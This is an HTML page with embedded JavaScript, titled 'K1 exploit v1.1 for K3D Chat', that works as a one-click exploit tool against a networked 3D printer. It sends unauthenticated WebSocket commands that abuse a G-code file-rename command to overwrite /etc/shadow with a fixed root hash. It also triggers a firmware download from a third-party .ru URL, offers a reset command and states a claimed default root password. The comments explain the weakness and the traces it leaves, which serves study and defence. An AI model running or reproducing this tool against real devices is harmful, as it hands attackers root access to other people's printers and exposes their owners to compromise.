<html>
<head>
<title>K1 exploit v1.1 for K3D Chat</title>
<script>
// Replacement /etc/shadow content that patchShadow() uploads to the printer.
// Only `root` carries a password hash; the `$5$` prefix marks it as SHA-256
// crypt. Every other listed account has `*` in the hash field, i.e. no usable
// password. The alert in patchShadow() states the resulting login as
// root:creality, which is presumably the plaintext behind this hash (not
// verifiable from this page).
// Forensic note: a device whose /etc/shadow matches this text byte for byte,
// alongside an /etc/shadow.bak, is consistent with patchShadow() having run.
const patchedShadowStr = [
  "root:$5$/iMbCgHty3$rM7UZICj9tmUe13BcAOUgVvpa.sSMV4k/t2Yes64ZZ9:::::::",
  ...["daemon", "bin", "sys", "sync", "mail", "www-data", "operator", "nobody", "dbus"].map(
    (account) => account + ":*:::::::",
  ),
  "", // trailing element so the joined text ends with a newline
].join("\n");

// Wrapped as a Blob so it can be attached to a multipart form upload.
const shadowBlobOptions = { type: "text/plain" };
const patchedShadowBlob = new Blob([patchedShadowStr], shadowBlobOptions);
/**
 * Opens a WebSocket to port 9999 on the host typed into the `ip` input and
 * sends `payload` as the first frame once the socket is open.
 *
 * Nothing on this page sends a credential, token or login frame before the
 * payload, and the transport is plain `ws://` (unencrypted). As far as this
 * page shows, the listener acts on a command from any client that can reach
 * the port, so limiting which hosts can reach port 9999 is the network-level
 * control.
 *
 * @param {string} payload - JSON text sent verbatim to the device.
 * @param {boolean} [needAlert=true] - When true, a result dialog is shown
 *   100 ms after the socket opens and the socket is closed on success. When
 *   false, no dialog is shown and the socket is left open.
 */
function sendPayload(payload, needAlert = true) {
  const host = document.getElementsByName("ip")[0].value;
  const ws = new WebSocket('ws://' + host + ':9999');

  // If the connection never opens, this handler never runs and the user gets
  // no feedback at all.
  ws.onopen = () => {
    ws.send(payload);
    if (!needAlert) {
      return;
    }
    // "Sent" only means the socket was still open 100 ms later; it is not an
    // acknowledgement from the device that the command was applied.
    setTimeout(() => {
      if (ws.readyState !== WebSocket.OPEN) {
        alert('Payload failed!');
        return;
      }
      alert('Payload sent!');
      ws.close();
    }, 100);
  };
}
/**
 * "Method A": replaces the printer's /etc/shadow with `patchedShadowBlob`.
 *
 * Sequence, as visible in this function:
 *   1. WebSocket command `opGcodeFile` / `renameprt` moves /etc/shadow to
 *      /etc/shadow.bak.
 *   2. After a fixed 250 ms wait (a delay, not a confirmation that step 1
 *      finished), the blob is POSTed as multipart form data to
 *      /upload/new_shadow.gcode on the device's HTTP port.
 *   3. On HTTP 200, a second `renameprt` moves the uploaded file from
 *      /usr/data/printer_data/gcodes/ to /etc/shadow.
 *
 * The underlying weakness, as far as this page shows, is that a file command
 * meant for G-code files takes absolute paths outside the G-code directory
 * and is executed with enough privilege to replace /etc/shadow. Confining
 * that command to the G-code directory and authenticating the WebSocket and
 * upload endpoints would remove it.
 *
 * Traces left on the device: /etc/shadow.bak, an upload request for
 * new_shadow.gcode, and a changed /etc/shadow. The success dialog is shown
 * right after the final command is queued; the result is not verified.
 */
function patchShadow() {
  const host = document.getElementsByName("ip")[0].value;

  console.log('Backing up current shadow file...');
  sendPayload('{"method":"set","params":{"opGcodeFile":"renameprt:/etc/shadow:/etc/shadow.bak"}}', false);

  const uploadAndApply = () => {
    console.log('Uploading new shadow file...');
    const form = new FormData();
    form.append('file', patchedShadowBlob, 'new_shadow.gcode');

    const request = new XMLHttpRequest();
    request.onload = () => {
      // Loose comparison kept exactly as in the original check.
      if (request.status != 200) {
        alert('Upload failed!');
        return;
      }
      console.log('Applying new shadow file...');
      sendPayload('{"method":"set","params":{"opGcodeFile":"renameprt:/usr/data/printer_data/gcodes/new_shadow.gcode:/etc/shadow"}}', false);
      alert('Payload sent! New SSH credentials should be:\nroot:creality');
    };
    request.open('POST', 'http://' + host + '/upload/new_shadow.gcode', true);
    request.send(form);
  };

  setTimeout(uploadAndApply, 250);
}
/**
 * Sends a `linuxUpgrade` command whose value is the URL of a firmware image,
 * i.e. the device is told where to download its system image from.
 *
 * The URL is supplied by the client and points at a third-party host; this
 * page carries no checksum or signature for the image, and whether the device
 * verifies what it downloads is not visible here. From the device's side this
 * is an update command that accepts a caller-chosen source.
 *
 * NOTE(review): the function name and the button label say 1.2.9.15, but the
 * image file name carries V1.2.9.22 — confirm which version is installed.
 */
function rollbackTo15() {
  const command = {
    method: "set",
    params: {
      linuxUpgrade: "https://ytkab0bp.ru/k3d/CR4CU220812S11_ota_img_V1.2.9.22.img",
    },
  };
  // Serialises to the same compact JSON text the device command expects.
  sendPayload(JSON.stringify(command));
}
/**
 * "Method B": sends one `opGcodeFile` / `renameprt` command that moves
 * /usr/data/printer_data/gcodes/shadow.gcode onto /etc/shadow.
 *
 * This function uploads nothing itself, so a file named shadow.gcode has to
 * be in the G-code directory already. Unlike patchShadow(), it does not move
 * the existing /etc/shadow to a backup first. The weakness is the same:
 * the rename command is given a destination outside the G-code directory.
 */
function moveShadow() {
  const command = {
    method: "set",
    params: {
      opGcodeFile: "renameprt:/usr/data/printer_data/gcodes/shadow.gcode:/etc/shadow",
    },
  };
  sendPayload(JSON.stringify(command));
}
/**
 * Sends a `resetSystem` command with the value 15. The page labels this
 * button "Reset system if something went wrong".
 *
 * NOTE(review): the meaning of 15 (reset level, bit mask, ...) is not shown
 * on this page — confirm against the device firmware before relying on it.
 * As with the other commands, it goes out over the same WebSocket with no
 * credential attached by this page.
 */
function reset() {
  const command = { method: "set", params: { resetSystem: 15 } };
  sendPayload(JSON.stringify(command));
}
</script>
</head>
<body>
IP: <input type="text" name="ip"/><br>
Unlock SSH: <button onclick="patchShadow()">Method A</button> <button onclick="moveShadow()">Method B</button><br><br>
Reset system if something went wrong: <button onclick="reset()">Reset</button><br>
Rollback to 1.2.9.15: <button onclick="rollbackTo15()">Go!</button><br>
Note: vanilla root password seems to be 0755cxsw$888
</body>
</html>